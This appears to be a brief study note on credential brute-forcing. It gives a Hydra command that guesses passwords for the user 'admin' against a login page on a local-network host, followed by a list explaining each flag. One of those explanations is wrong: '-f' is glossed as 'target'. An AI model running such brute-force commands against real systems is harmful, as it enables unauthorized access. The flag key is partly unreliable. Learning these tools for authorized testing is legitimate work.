It can either exploit a vulnerability or leverage credentials to gain access.
hydra -l admin -P 1000_common_passwords.txt -s 8090 -f 192.168.1.4 http-get /logon.php
-l --> username
-L --> username list
-p --> password
-P --> password list
-f --> target
-t --> threads
-s --> port
http-get --> method
/logon.php --> login path